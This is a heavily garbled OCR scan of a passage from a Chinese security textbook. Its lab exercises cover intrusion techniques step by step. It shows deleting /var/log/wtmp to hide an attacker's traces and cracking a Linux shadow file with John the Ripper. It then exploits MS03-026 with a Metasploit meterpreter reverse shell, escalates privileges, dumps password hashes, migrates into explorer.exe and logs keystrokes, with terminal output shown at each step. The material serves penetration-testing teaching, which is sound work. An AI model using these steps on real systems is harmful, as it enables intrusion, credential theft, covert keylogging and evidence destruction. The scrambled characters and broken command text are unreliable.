3-31 执行 “rm -f /var/log/wtmp" p Ẹ& 


当 以 root HH P! Erf X 5& Z& Sup , 既 可 以 使 用 “rm -f / var/log/wtmp" 命令 令 来 将 对 应 的 日 
志 删 除 , 也 可 以 使 用 rg 令 将 内 容 清空 ,以 上 两 种 方式 虽然 能 够 彻底 地 消除 
攻击 者 留 下 的 痕迹 ,但 是 会 被 系统 管理 员 发 现 。 因 此 ,可 以 选择 使 用 编辑 硕 对 日 志文 件 进行 
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rootplisch wus local sraschins 


We El View Soaurch Terminal Help 


3-32 ”确认 wtmp 文件 已 经 被 删除 


选择 性 的 修改 ,具体 命令 为 “vi/var/log/wtmp”。 其 中 ,有 关 Linux 下 的 vi 编辑 需 的 使 用 方 
法 ,读者 可 通过 查阅 相应 的 文献 ,并 通过 上 机 操作 来 掌握 。 
使 用 相同 的 方法 ,可 以 对 其 他 日 志文 件 进 行 修 改 、 删除 操作 。 


3.4.4 任务 与 思考 


由 于 Linux 系统 是 基于 文件 记录 的 系统 日 志 , 尽 管 重要 的 日 志文 件 已 经 是 二 进 制 的 ,但 
是 由 于 Linux 是 开源 的 操作 系统 ,因此 有 些 情况 下 攻击 者 在 入 侵 后 经 和 常会 通过 消除 日 志 信 
息 来 “打扫 战场 ”。 虽 然 在 这 种 情况 下 日 志 信 息 显 得 不 是 那么 可 靠 , 但 是 如 果 能 够 综合 运用 
Linux 系统 提供 的 大 量 命令 ,通过 系统 的 .关联 的 分 析 还 是 能 够 找到 攻击 者 的 蛛丝马迹 。 

Linux 提供 了 功能 强大 和 类 型 丰富 的 日 志 功 能 ,和 希望 读者 能 够 通过 全 面 学 习 和 不 断 实 
践 ,掌握 Linux 系统 日 志 的 组 成 ,存放 位 置 及 安全 管理 方法 。 


3.5 使 用 John the Ripper 破解 Linux 系统 密码 


3.5.1 预备 知识 : John the Ripper 介绍 


John the Ripper 是 一 于 在 已 知 密 文 的 情况 下 尝试 破解 出 明文 的 密码 破解 工具 , 文 持 
DESs,MD4, MD5 等 目前 大 多 数 的 加 密 算法 。John the Ripper 虽然 文 持 UNIX, Linux, 
Windows, DOS 模式 .BeOS、OpenVMS 等 多 种 类 型 的 系统 染 构 ,但 主要 用 于 破解 不 够 牢固 
的 UNIX/Linux 系统 密码 。John the Ripper 的 官方 网 站 为 http://www. openwall. com/ 
john/ ,下 面 介绍 它 提 供 的 4 种 破解 模式 。 

1. 简单 破解 模式 

简单 破解 模式 (single crack mode) 为 专门 针对 “使 用 账号 作为 密码 ”的 用 户 , 如 某 一 个 
账号 用 户 名 为 “admin”, 对 应 的 密码 为 “admin888”admin123” 等 。 使 用 这 种 破解 模式 时 ， 
John the Ripper 会 根据 密码 内 的 账号 进行 密码 破解 ,并 且 使 用 多 种 字 词 变化 的 规则 套用 到 
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账号 内 ,以 增加 破解 的 成 功率 。 

2. 字典 破解 模式 

字典 破解 模式 (wordlist crack mode) 需 要 用 户 指 定 一 个 字典 文件 ,John the Ripper i€ 
取 用 户 给 定 的 字典 文件 中 的 单词 进行 破解 。John the Ripper 中 上 月 市 了 一 个 字典 ,字典 文件 
名 为 password. lst, 文 件 中 包含 了 一 些 常 用 来 作为 密码 的 单词 。 

这 种 方式 比较 简单 ,只 需 告 诉 John the Ripper 密码 文件 的 位 置 即 可 ,在 这 种 模式 下 
John the Ripper 会 日 动 使 用 字 词 变化 功能 进行 破解 。 

3. 增强 破解 模式 

增强 破解 模式 (incremental mode) Œ John the Ripper 中 功能 最 为 强大 的 破解 模式 , 它 
会 日 动 尝试 所 有 可 能 的 字符 组 合 , 然 后 当 作 密码 来 破解 。 该 模式 属于 骏 力 破 解 方法 ,所 以 破 
解 过 程 中 所 用 的 时 间 较 长 。 

4. 外 挂 破解 模式 

外 挂 破解 模式 (external mode) 是 让 使 用 者 用 C 语言 编写 “破解 模块 程序 ”, 然 后 将 编写 
后 的 “破解 模块 程序 ” 挂 接 在 John the Ripper 环境 下 ,进行 密码 的 破解 操作 。“ 破 解 模 块 程 
序 ” 是 用 C 语言 编写 的 函数 ,该 函数 的 功能 是 根据 破解 需要 产生 字典 文件 ,John the Ripper 
通过 读 取 字典 文件 中 的 单词 来 破解 密码 。 


3.5.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 主要 车 握 以 下 内 容 。 

(D Linux 操作 系统 中 用 户 密码 的 保存 特点 。 
(2) 常见 密码 的 破解 方法 。 

(3) John the Ripper 工具 的 使 用 方法 。 


2. 实验 条 件 


本 实验 可 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 的 Windows 服务 器 操作 系统 


3.5.3 实验 过 程 


步骤 1: 以 系统 管理 员 和 号 份 正常 登录 Windows 服务 大 操作 系统 ,然后 进入 John the 
Ripper 工具 软件 的 安装 文件 夹 (本 实验 为 D:N\tools\john179) ,主要 有 doc 和 run 两 个 文件 。 
其 中 , 主 程序 为 run 文件 夹 下 的 john. exe,john. ini 为 它 的 配置 文件 。 

步骤 2: John the Ripper 工具 为 命令 行 下 使 用 的 一 个 软件 ,有 关 操 作 都 需要 在 命令 提示 
符 下 进行 。 选 择 “ 开 始 ”>“ 运 行 ” 选 项 ,在 出 现 的 对 话 框 中 输入 “cmd” 命 令 , 按 Enter 键 后 打 
开 “ 命 令 提示 符 ” 窗 口 ,输入 “cd tools\john179\run” 命 令 进 入 run 文件 夹 , 如 图 3-33 所 示 。 

步骤 3: 输入 “john. exe” 命 令 ,会 出 现 有 关 John the Ripper 工具 的 使 用 参数 说 明 , 如 图 3-34 
所 示 。 

John the Ripper 工具 的 命令 使 用 格式 为 : 
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cx C: \FINDOTS\systes32\cad. exe 
Microsoft Windows [版 本 5.2.3798] 
«C» hETVPI 1985-2803 Microsoft Corp. 


C:\Documents and Settings'Müdministrator»d: 
D:*»cd tools Vjohní79 «run 


D: tools Njohní179 «run», 


图 3-33 ”切换 到 John the Ripper 所 在 的 文件 夹 


cx C: MINDOÜTSisysten32 Vend. exe 


D: tools \johni 79? «run»? john.exe 

John the Ripper password cracker, version 1.7.9 
Copyright <c) 1996-2811 by Solar Designer 
Homepage: http://www.openvall.com/john^/ 


"single crack" mode 
—-wordlist-FILE --stdin wordlist mode. read words from FILE or stdin 
—-rules enable word mangling rules for wordlist mode 
——increnentall-MODE]l "incremental" mode [using section MODE] 
——external-MODE external mode or word filter 
—stdout [LENGTH 1 just output candidate passwords [cut at LENGTH] 
restore [=NAÂME] restore an interrupted session [called NAME] 
——session-NAaME give a neu session the NAME 
——status[-NRME]1 print status of a session [called NAME] 
—-nmake-charset-FILE make a charset, FhLE vill be overwritten 
一 -人 Show show cracked passuórds 
-—-test[-TIME]1 run tests and benchmarks for TIME seconds each 
--users"[-]LOGIN:!UIDI,..1] [do not] load this (these? user(s? only 
—qroups -[-1GIDI,..1 load users [not] of this Cthese> groups? only 
——-shells-[-l]SHELLI...]1 load users wvith[out] this these? shells? only 
——-salts-[-JCOUNT load salts vith[out] at least COUNT passwords only 
—-saue-nmenory-LEUEL enable memory saving, at LEUEL 1..3 
——-fornat -NAME force hash type NAME: des/bsdi/mdb5/bf/afs/lm^/trip^/ 
dummy 


图 3-34 John the Ripper 工具 的 参数 说 明 
john [选项 ] [密码 文件 ] 


运行 "john. exe" 命令 后 ,在 图 3-34 中 对 每 一 个 参数 的 功能 及 使 用 方法 进行 了 详细 说 
BH ,读者 可 根据 需要 选择 使 用 相关 的 参数 。 

步骤 4: 破解 Linux 密码 。John the Ripper 是 对 密码 文件 进行 破解 的 工具 ,要 破解 
Linux 密码 ,首先 要 取得 它 的 密码 文件 ,假设 在 实验 中 已 取得 了 一 个 Linux 的 密码 文 
shadow ,shadow 文件 在 实验 之 前 已 经 复制 到 D:NtoolsNjohnl79Nrun 文件 夹 中 。 现 在 需要 
对 shadow 文件 进行 破解 操作 ,最 简单 的 破解 命令 为 "john. exe shadow”, 运 行 过 程 和 结果 如 
图 3-35 所 示 。 

可 以 看 到 ,破解 出 root 用 户 的 密码 为 abc123。 密 码 破 解 的 字典 文件 password. Ist 可 以 
用 记事 本 打开 ,然后 根据 破解 需要 目 己 添加 字典 内 容 ,John the Ripper 进行 密码 破解 时 会 
ix HC SC PF IP BS PI EXE AP DUI 


3.5.4 任务 与 思考 


本 实验 的 操作 过 程 相 对 简单 ,但 涉及 的 知识 面 较 广 ,主要 包括 常见 的 加 密 算 法 和 加 密 机 
iml. Linux 系统 中 用 户 密码 的 存储 和 管理 方式 、 密 人 码 破 解 方 法 等 。 请 读者 在 本 实 验 的 基础 
上 ,对 以 上 内 容 进 行 深入 系统 的 学 习 。 
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ev C: MIBDOTSisystem32Ncnd. exe 


—-nake-charset FILE make a charset, FILE vill be overwritten 
Show cracked passwords 
run tests and benchmarks for TIME seconds each 
[do not] load this Cthese? users? only 
—-groups -[-IGIDI... load users [not] of this these) groups? only 
——shells-I-l]SHELLI,..1] load users with[out] this «these? shells? only 
——salts-I[-lCOUNT load salts with[out] at least COUNT passwords only 
——saue-mnemory-zLEUEL enable memory saving, at LEUEL 1..3 
——format NAME force hash type NAME: des/bsdi/md5/bf/afs/lnm/trip/^/ 
dummy 


D: tools Njohni779 «run»? 
D: *tools Njohní'9 «run? 
D: *toolsNjohnií1779 «run»? 
D: *toolsNjohnií79 «run? 
D: *tools Mjohní'79 «run»? 
D: *£ools Njohní'9 «run? 
D: tools Vjohni179*Xrun»john.exe shadow 
Loaded 3 password hashes with 3lifferent salts «FreeBSD MD5 [32/3215 
test (test> 
hehe> 
Croot> 
quesses: 3 time: B:88:88:88 1880» (2) czs: 8526 trying: abci23 
Use the “—-show" option to display all of the cracked passwords reliably 


B] 3-35 运行 “john. exe shadow" $5 & ,破解 shadow 文件 


同时 ,John the Ripper 是 一 款 功 能 强大 的 密码 破解 工具 ,提供 了 大 量 的 参数 ,不 同 参 数 
体现 了 不 同 的 应 用 功能 ,也 为 不 同情 况 下 的 密码 破解 提供 了 帮助 和 支持 。 读 者 可 在 本 实验 
操作 的 基础 上 ,参阅 John the Ripper 软件 的 帮助 文档 或 其 他 技术 资料 ,并 通过 具体 操作 ,全 
ifi 3€ 1$ John the Ripper 软件 的 使 用 方法 。 


3.6 Meterpreter BET ido 


3.6.1 预备 知识 : Metasploit 框架 介绍 


BackTrack 预 闭 了 最 第 用 的 高 级 漏洞 利用 工具 集 ,Metasploit 框架 (Chttp//www， 
metasploit. com) 便 是 其 中 之 一 。Metasploit 是 一 个 免费 的 .可 下 载 的 框架 ,通过 该 框架 可 以 
获取 、 开 发 针对 计算 机 软件 漏洞 实施 的 攻击 ,Metasploit 本 号 附 市 数 百 个 已 知 软件 漏洞 的 专 
业 级 漏洞 攻击 工具 。Metasploit 框架 使 用 Ruby 程序 语言 编写 ,具有 较 好 的 扩展 性 。 

Metasploit 框架 由 库 、 接 口 和 模块 三 部 分 组 成 ,其 中 ,本 实验 关注 的 重点 是 各 个 接口 和 
模块 的 功能 。Interfaces( 控 制 台 、CLI、Web、GUI 等 ) 为 处 理 模 块 (漏洞 利用 、 有 效 载荷 .辅助 
工具 、 加 密 引 擎 、Nops 等 ) 提 供 操作 接口 。 每 个 模块 都 有 有 自己 的 价值 ,在 渗透 测试 中 起 到 不 
同 的 作用 ,具体 如 下 。 

(1) 漏洞 利用 。 漏 洞 利用 是 一 串 验 证 性 代码 ,主要 针对 目标 系统 的 特定 漏洞 开发 。 

(2) 有 效 载荷 。 有 效 载 荷 是 一 段 恶 意 代 码 , 也 可 能 是 漏洞 验证 程序 的 一 部 分 ,还 可 能 是 
独立 编译 后 用 于 在 目标 系统 上 运行 的 任意 命令 。 

(3) 辅助 工具 。 辅 助 工具 是 一 个 工具 集 , 用 于 扫描 、 咒 探 \ 区 域 拨 号 、 获 取 指 纹 及 其 他 安 
全 评估 任务 。 

(4) 加 密 引 擎 。 开 发 用 来 加 密 渗 透 测试 中 的 有 效 载 集 , 以 对 抗 杀毒 软件 .防火墙 .IDS/ 
IPS 及 其 他 类 似 的 反 恶 意 软 件 的 查 


ES 
小 。 
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(5) NOP( 空 操作 )。NOP 是 一 个 汇编 指令 ,通常 插入 shellcode 中 ,不 起 任何 作用 ,只 
是 用 来 为 有 效 载荷 占 位 。 

Meterpreter 是 Metasploit 框架 中 的 一 个 功能 模块 ,通常 作为 漏洞 洲 出 后 的 攻击 载 集 来 
使 用 ,攻击 载荷 在 触发 漏洞 后 能 够 返回 给 攻击 者 一 个 控制 通道 。Meterpreter 是 一 种 先进 
的 、 隐 项 的 、 多 功能 的 、 可 动态 扩展 的 载荷 ,通过 dll 注入 的 方式 进入 目标 内 存 , 支 持 脚 本 和 
插件 在 运行 时 进行 动态 装载 ,以 保持 可 扩展 性 。Meterpreter 的 主要 功能 包括 提 权 ,保存 系 
统 账号 .记录 关键 信息 、 保 持 后 门 服 务 . 开 启 远程 划 面 等 ,同时 Meterpreter shell 的 整个 通信 
过 程 都 是 默认 加 密 的 。 


3.6.2 实验 目的 和 条 件 


1. 实验 目的 


Metasploit 框架 是 一 个 功能 非常 强大 的 开源 平台 ,提供 了 开发 ,测试 和 使 用 恶意 代码 所 
需要 的 环境 ,为 渗透 测试 、shellcode 编写 和 漏洞 研究 提供 了 一 个 可 靠 o Metasploit 框架 
一 个 庞大 的 系统 ,在 一 个 实验 中 无 法 完全 反映 其 功能 。 本 实验 主要 介绍 了 Metasploit 框 
RH Meterpreter 模块 的 部 分 应 用 ,主要 目的 是 让 读者 对 Metasploit 框架 有 个 初步 的 认识 。 
2. 实验 条 件 
本 实验 所 需要 的 软 便 件 清单 如 表 3-1 所 示 。 


表 3-1 Meterpreter 键盘 记录 实验 清单 


1f8 
gn 
1 
一 


3.6.3 实验 过 程 


步骤 1: 打开 攻击 机 bt5(BackTrack 5) ,如 果 进 入 命令 行 模式 ,可 以 输入 “startx” 命 令 切 
换 到 如 图 3-36 所 示 的 图 形 界面 ,以 便于 操作 。 

步骤 2: 选择 BackTrack 一 Exploitation Tools > Network Exploitation Tools 一 Metasploit 
Framework 一 Msfconsole 选项 来 启动 MSF Console, MSF (Metasploit Framework) Console 是 
一 个 高 效 的 多 功能 接口 ,可 方便 渗透 测试 者 更 好 地 利用 泥 洞 程序 框 染 。 

步骤 3: 输入 “search ms03 026” 命 令 , 查 询 “MS03-026 漏洞 ”的 相关 信息 ,如 图 3-37 所 
示 。 在 查询 到 “MS03-026 漏洞 ?后 ,还 可 以 输入 “info exploit/windows/dcerpc/ms03_026_ 
dcom” 命 令 , 了 解 MS03 026 dcom 利用 程序 的 相关 内 容 。 

步骤 4: 在 掌握 MS03_026_dcom 相关 信息 的 基础 上 ,输入 “use exploit/windows/ 
—— 026 dcom" MS ,查看 “利用 漏洞 ?程序 需要 设置 的 相关 内 容 , 如 图 3-38 所 示 。 

过 命令 提示 符 的 改变 ,说明 该 命令 已 经 成 功 运行 。 
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Applications Places System [T] d Sun Jan 20, 12:28 PM 


A 


Install BackTrack 


3-36 BackTrack 5 图 形 界 面 


^ vw X root@bt: ~ 
File Edit View Terminal Help 


0020 
o 0 
0 


| 
| 
| 
| 
| PAYLOAD 
| 

| 


v [core:4.5 


exploi ts - 499 auxiliar y - 151 post 
1 Gavidads - 28 encoders - 8 nops 


msf > search ms93 926 


DisCclosu Data En "Beserip ui os 


exploit/windoWs/dcerpc/msaBug26 geo 2983907-160».90:d5:00 UTC brek Microsóft RAC DCOM.Aintegface 
Overflow 


图 3-37 查询 “MS03-026 漏洞 ” 


步骤 5. 继续 对 攻击 环境 进行 配置 。 其 中 : 
输入 “set RHOST 192.168. 1. 249" MA ,设置 攻击 主机 ( 靶 机 ) 的 IP 地 址 。 
输入 “set LHOST 192. 168. 1.248” 命 令 ,设置 本 机 (攻击 机 ) 的 IP 地 址 。 
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^ v X root@bt: ~ 


File Edit View Terminal Help 


metasploit v4.5.0-dev [core:4.5 api:1.9] 
928 exploits - 499 auxiliary - 151 post 
251 payloads - 28 encoders - 8 nops 


msf > search ms03 026 


Matching Modules 


Disclosure Date Rank X Description 
atait dcefpc dà 026 dcom 2003-07-16 00:00:00 UTC great Microsoft RPC DCOMBEnterface 
Overflow 


msf > use exploit/windows/dcGpFpc/ms03 026 dcom 


exploit(ffig3 020. dcom) 
exploit(msQ9 026 dtom) 
exploit(ms83 026 dcom) 
exploit(ms03 026 dcom) 
exploit(ms03 026 dcom) 
exploit(ms03 026 dcom) 


图 3-38 ”查看 “利用 漏洞 ”程序 需要 设置 的 相关 内 容 


输入 “set LPORT 135” 命 令 ,设置 监听 端口 。 
输入 “set payload windows/meterpreter/reverse tcp" fp ,执行 “利用 漏洞 ?程序 


输入 “exploit” 命 令 , 会 探测 到 对 方 的 系统 类 型 和 语言 版 本 ,并 且 显 示 已 经 打开 的 


meterpreter E nn ð 
以 上 操作 如 图 3-39 所 示 。 


^ v X rpootQGbt ~ 
File Edit View Terminal Help 


use exploit/windows/dcerpc/ms03 026 dcom 
edm 03 026 dcom) > 
exploit (mse 
exploit(m 503 
er 93 
exploit(m 
exploit(ms 
exploit (ms 026 dcom) set RHOST 192.168.1.249 
RHOST => 192. 168. 1.249 
msf exploit(ms03 026 dcom) set LHOST 192.168.1.248 
LHOST => 192.168.1.248 
exploit(ms03 026 dcom) set LPORT 135 
-» 135 
exploit(ms03 026 dcom) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 
msf exploit(ms83 026 dcom) > exploit 


nca? 
2092 


Started reverse handler on 192.168.1.248:135 

Trying target Windows NT45P3-6a/2000/XP/2083 Universal... 

Binding to 4d9f4ab8-7dlcMM1cf-861e-0020af604c57:0.0dhcacngip tcp:192.168.1.249[135] 

Bound to 4d9f9Wab8 201c-118T^ 86167 90293$6€7 03748 .0Gndecn TRE tc ^ 198 . 14235 10 351 

Sending eoit S. 

Sending stag® (752128 bytesjoto'29221082243 249 

Meterpreter session 1 opened (192.168.1.248:135 -> 1$2.168.1.249:1550) at 2013-12-24 1§:27753 +980 


meterpreter > J 


图 3-39 配置 攻击 环境 
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步骤 6: 在 “meterpreter >” 后 输入 “help” 命 令 , 可 以 获得 关于 Meterpreter 的 详细 使 用 
方法 说 明 , 如 图 3-40 所 示 。 


a vx Terminal , 
File Edit View Terminal Help 


meterpreter » help 


Core Commands 


Description 


| Help menu | 
background Backgrounds the current session 


bgkill Kills a background meterpreter sCTüpi 
bglist Lists running background scripts 
bgrun » ,Executes a ,meterpreter script as jā tacky pount thre 


ché dà DU Nt fispläys TA f bout: factive Channels 
Olos? Ciose$ a charnnet 
disable unicode encoding Disabkes encoding of unicode strings 
enable unicode encoding Enables encoding of unicode strings 
exit Terminate the meterpreter session 
help Help menu 
info Displays information about a Post module 
interact Interacts with a channel 
irb Drop into irb scripting mode 
load Load one or more meterpreter extensions 


图 3-40 ”获得 关于 Meterpreter 的 详细 使 用 方法 说 明 


步骤 T: 执行 完 exploit 后 AU 经 获得 了 -个 Meterpreter shell, 接 下 来 获取 系统 权 
限 , 先 输入 “getuid” 命 令 ,获取 系统 的 运行 账户 ,如 图 3-41 所 示 。 


^ vw X Terminal 
File Edit View Terminal Help 


timestomp Manipulate file MACE attributes 


meterpreter » getuid 

Server username: NT AUTHORITYXSYSTEM 

meterpreter » use priv 

[-] The 'priv' extension has already been loaded: 
meterpreter » getsystem -h 

Usage: getsystem [options] 


Attempt to elevate your privilege to that of local system. 


OPTIONS: 


cA 


"e p sm 


Td sh «€. Help BanMef. à ! n 
^t «Opt» Mhe techhi ue touse. f (Default 56.6"). 
: All fecundus vailable 


: Service - Named Pipe Impersonation (In Memory/7Aümin) 
: Service - Named Pipe Impersonation (Dropper/Admin) 

: Service - Token Duplication (In Memory/Admin) 

: Exploit - KiTrap8D (In Memory/User) 


meterpreter » 


图 3-41 获取 系统 的 运行 账户 


步骤 8: 输入 “getsystem ”命令 ,获取 系统 权限 ,如 图 3-42 所 示 。 男 外 ,也 可 以 输入 
“getsystem -h” 命 令 来 获得 针对 getsystem 命令 的 详细 使 用 方法 。 

步骤 9: 输入 “sysinfo” 命 令 ,查看 目标 主机 的 全 HO 3-43 所 示 。 可 以 看 到 被 攻击 主 
机 的 名 称 、 系 统 类 型 .架构 类 型 .系统 语言 等 信息 。 
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|^ ~v x Terminal 
File Edit View Terminal Help 


Server username: NT AUTHORITYXSYSTEM 
meterpreter » use priv 
[-] The 'priv' extension has already been loaded: 


meterpreter » getsystem -h 
Usage: getsystem [options] 


Attempt to elevate your privilege to that of local system. 


OPTIONS: 


-h Help Banner. 
-t «opt» The RE to use. (Default to '8'). 
: : All techpiques available ， 
: Service £ Named Pipl Impersonation [In Memóry/Admin) 
: sehvice Mamed Pip Inpersomne td on (rropper/Adnin) 
: Service - MERE EUN (Ir^Menory/Admin) 
: Exploit - KiTrapeD (In Memory/User) 


meterpreter » getsystem 

. .got system (via technique 1). 
meterpreter » clear 
[-] Unknown command: clear. 


meterpreter » 


图 3-42 获取 系统 权限 


^ v x root@bt: ~ 
File Edit View Terminal Help 


msf exploit(ms03 026 dcom) > set LPORT 135 

LPORT -» 135 

msf exploit(ms03 026 dcom) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(ms03 026 dcom) > exploit 


Started reverse handler on 192.168.1.248:135 

Trying target Windows NT SP3-6a/2000/XP/2883 Universal... 

Binding to 4d9f4ab8-7dlc-1llcf-861e-80298af6e7c57:0.80(ncacn ip tcp:192.168.1.249[135] 

Bound to 4d9f4ab8-7dlc-11cf-861e-0028af6e7c57:8.0Gncacn ip tcp:192.168.1.249[135].. 

Sending exploit ... 

Sending stage (752128 bytes) to 192.168.1.249 

Meterpreter session 1 opened (192.168.1.248:135 -> 192.168.1.249:1550) at 2013-12-24 15:27:53 +080 


meterpreter > getsystem 
..got system (via technique 1). 
meterpreter » getvid 
[-] Unknown command: getvid. 
meterpreter » getuid 
server username: NT AUTHORITI SYSTEM 
eterpreter > sysinfo. F Wa 
二 DONSOTUOXLAM3PS l | 
* Windows .NET*Server ,so 
rchitecture : x86 
pystem Language : zh CN 
: x86/win32 


图 3-43 ”查看 目标 主机 的 信息 


步骤 10: 接 下 来 ,可 以 通过 “run hashdump?” 命 令 ,获取 系统 用 户 的 Hash 值 ,如 图 3-4 
所 示 


2 


在 获得 了 目标 主机 的 Hash 值 后 ,可 以 使 用 相关 的 软件 (如 Ophcrack) 进 行 破解 ,具体 方 
法 在 此 不 再 芍 述 。 请 读者 在 查阅 相关 文献 资料 的 基础 上 ,通过 上 机 操作 ,学 习 有 关 
Ophcrack 等 破解 工具 的 应 用 特点 和 使 用 方法 。 


步骤 11; 
对 方 在 自己 的 计算 机 上 和 输 
图 3-45 所 示 ,可 以 查看 到 explorer. exe 程序 的 ID 是 


^ v 


1184 452 
chost.exe 
1289 408 
gon. scr 
1316 452 
ssvc.exe 
1512 1496 
E 
1588 1512 
fmon.exe 
1624 1512 
d.exe 
1640 1624 
nime.exe 
1856 632 


^ wv 


A 


x Terminal 


File Edit View Terminal Help 
: Windows 2000 (Build 2195, Service Pack 4). 


0S 


Architecture 
System Language : 
Meterpreter 


: x86 
zh CN 
: x86/win32 
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diopi EErun hashdump 


Obtaining the boot key.. 
Calculating the hboot key using SYSKEY ba7edf7d2cc19b9eedofSe8cTSHaelaa.. 
Obtaining the user list and keys.. 
Decrypting user keys.. 
Dumping password hashes... 


i 500: wc cx aN lslcxs € 31d6cfe8d164e931b73c59d7e0c68 


9c8: 


— 59i NW oW Ar Miabcieafficded31073c59d7ee«e89co: : 
TsIfternétuserisa 9807 Ab&cbicc8übda5f8$fbadascbo65824af fo; 5dBOaseda9cb7bbchdd706d444 


537bd: 


IUSR ADMINIST-840DES:1001:25625464€3434b14675c572d49fbd54 :0e248€337Cc612898c7ac 
916faaab382::: 
IWAM ADMINIST-840DE5:1002:6b9172bf81b9a65118cbad826033e1d5 : 3175524b87cee57c6dab5 
6fc3e56b408: : : 


meterpreter > J 


x root@bt ~ 
File Edit View Terminal Help 


svchost.exe 
notepad.exe 
svchost.exe 
svchost.exe 
spoolsv.exe 
msdtc.exe 

svchost.exe 
logon.scr 


dfssvc.exe 


explorer.exe 


ctfmon.exe 


«e. 


cmd.exe 


conime.exe 


wmiprvse.exe 


em\wmiprvse. exe 


meterpreter > 


所 示 。 


图 3-44 获取 系统 用 户 的 Hash 值 


DCN-OTUOXLAM3P5\Administrator 


| CN -oTUOXLAMSPS" NOM rif S ta ut 


图 3-45 


12: fip A "migrate 1512” 命 令 
. 继续 运 


iZ 1T " getuid" f 


1512. 


NT AUTHORITYXSYSTEM 
DCN-OTUOXLAM3PSXMAdministrator 
NT AUTHORITYXNETWORK SERVICE 
NT AUTHORITYXSYSTEM 

NT AUTHORITYXSYSTEM 

NT AUTHORITYXNETWORK SERVTCE 
NT AUTHORITYXLOCAL SERVICE 
DCN-OTUOXLAM3PSMAdministrator 


NT AUTHORITYXSYSTEM 


OCN- OTUDXLAM3PS^ Atimi nistrator 
DCN-OTUOXLAM3PSX Administrator 


NT AUTHORITYXSYSTEM 


Meterpreter 还 能 够 获得 并 记录 目标 主机 上 的 键盘 输 . 
入 的 信息 。 首 先 , 输 入 "ps ”命令 ， 


入 信息 , 即 能 够 远程 记录 


查看 目标 主机 上 运行 的 进程 ,如 


查看 目标 主机 上 运行 的 进程 


启动 该 程序 ,如 图 3 


命令 ,会 看 到 已 经 具有 Administrator 权限 了 


-46 所 示 。 


: \WINDOWS\System32\sv 
: \WINDOWS\system32\NO 
:\WINDOWS\system32\sv 
: \WINDOWS\ System32\ sv 
: WINDOWSA S ystem32Nsp 
: \WINDOWS ,system3?Nns 
: WINDOWS system32\sv 
: WINDOWSASystem32Alo 
: WINDOWS s yStem32NDf 


C; WINDOWS VEXpToTer. EX 


' di WINDOWSA system32\ ct 


C: WINDOWSASysSteg32NEm 
C: WINDOWS System32^ co 


C: NWWINDOWSAsystem32Nwb 


,如 图 3-47 


File Edit View Terminal Help 


696 1512 notepad.exe 


TEPAD.EXE 


832  Á 452 


chost.exe 


848 452 


chost.exe 


1032 452 


oolsy.exe 


1060 452 


dtc.exe 


1184 452 


chost .exe 


1280 408 


gon.scr 


1316 452 


SsVc.exe 


1512 1496 explorer.exe 


E 


1588 1512 


fmon.exe 


1624 1512 
d. 
1640 1624 


exe 


nime.exe 


1856 632 
emwmiprvse. 


erpreter » migrate 1512 


svchost.exe 
svchost.exe 
spoolsv.exe 
msdtc.exe 
svchost.exe 
logon. scr 


dfssvc.exe 


ctfmon.exe 
cmd.exe 
anime exc 


wmiprvse.exe 
exe 


[*] Migrating to 1512... 


[*] Migration completed successfully. 
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` 


DCN-OTUOXLAM3P5\Administrator 
NT AUTHORITYXNETWORK SERVICE 
NT AUTHORITYXSYSTEM 

NT AUTHORITYXSYSTEM 

NT AUTHORITYXNETWORK SERVICE 
NT AUTHORITYXLOCAL SERVICE 
DCN- OTUOXLAM3PSX Administrator 
NT AUTHORITYXSYSTEM 
DCN-OTUOXLAM3PS5MAdministrator 


DCN-OTUOXLAM3PSXM Administrator 


b DCN- xb mer yn Aem 


NT A RITYXSYSTEM 


cn- "ho 


C:\WINDOWS\Ssystem32\NO 
C:\WINDOWS\System32\5v 
C: \WINDOWS\System32\sv 
C: \WINDOWS\system32\sp 
C:XWINDOWSYSystem32Vms 


CRWINDOWS\ System32\sv 


C:\WINDOWSNSystem32\10 


C: \WINDOWS \ system32\Df 
C: WINDOWSWexplorer.EX 
C: WINDOWSAsystem32 Act 
WINDOWS Js ystem32^ dn 
décor No 


C: AWWINDOWSASySTÉm32YWwb 


^ v 


chost.exe 


1032 452 


oolsv.exe 


1060 452 


dtc.exe 


1184 452 


chost.exe 


1280 408 


gon.scr 


1316 452 


SSyc.exe 


E 


1512 1496 


1588 1512 


fmon .exe 


1624 1512 


d.exe 


1640 1624 


nime,.exe 


1856 632 


rootàbt: ~ 
File Edit View Terminal Help 
832 452 


svchost.exe 
svchost.exe 
spoolsv.exe 
msdtc.exe 
svchost.exe 
togon. scr 


dfssvc.exe 


explorer.exe 


ctfmon.exe 


cmd.exe 


conime.exe 


Waiprvstexe 


emWwniprvse.exe 


meterpreter » migrate 1512 


[*] Migrating to 1512... 


[*] Migration completed successfully. 


meterpreter » getuid 


Server username: DCN-OTUOXLAM3PSXAdministrator 


图 3-46 


1 
| 
| d 
v 


NT ET 


NT AUTHORITY\NETWORK SERVICE 
NT AUTHORITY\SYSTEM 

NT AUTHORITY\SYSTEM 

NT AUTHORITYXNETWORK SERVICE 
NT AUTHORITYNLOCAL SERVICE 
DCN-OTUOXLAM3PSX Administrator 
NT AUTHORITYXSYSTEM 
DCN-OTUOXLAM3PS M Administrator 
DCN-OTUOXLAM3PSX Administrator 
DCN-OTUOXLAM3PSM Administrator 


DCN- mAn EVAn trator 


"m 
"i 


启用 explorer. exe 程序 


C: WINDOWS system32Asv 
C: WWINDOWSASystem32Nsv 
C: \WINDOWS\system32\sp 
C: \WINDOWS\system32\ms 
CA WINDOWS \ system32\sv 
C: \WINDOWS\ Sys tem32\to 
C: WINDOWSNsystem32NDf" 
C: \WINDOWS \Explorer .EX 
C:\WINDOWS Wystem32\ct 
C: \WINDOWS\SYStem32\cm 
| j WINDOVS Ysypten32\ co 


doors systers Ayo 


I E 14: 


步骤 15 
步骤 16 


启动 键盘 记录 命令 “keyscan_start”， 


图 3-47 查看 权限 


. 输入 “keyscan_dump” 命 令 ,进行 键盘 输 


: 在 被 攻击 的 主机 上 打开 “记事 本 ”等 编辑 工具 
就 可 以 获取 到 键盘 输入 的 信息 ,如 


然后 ， 在 Back’ [| rack rH HEU sí 人 条“ 'keyscan | dump' fü, 


图 3- 


90 所 示 。 
步骤 17: Hi 5 AX"keyscan stop" fip 


开始 记录 键盘 信息 ,如 图 3-48 所 示 。 


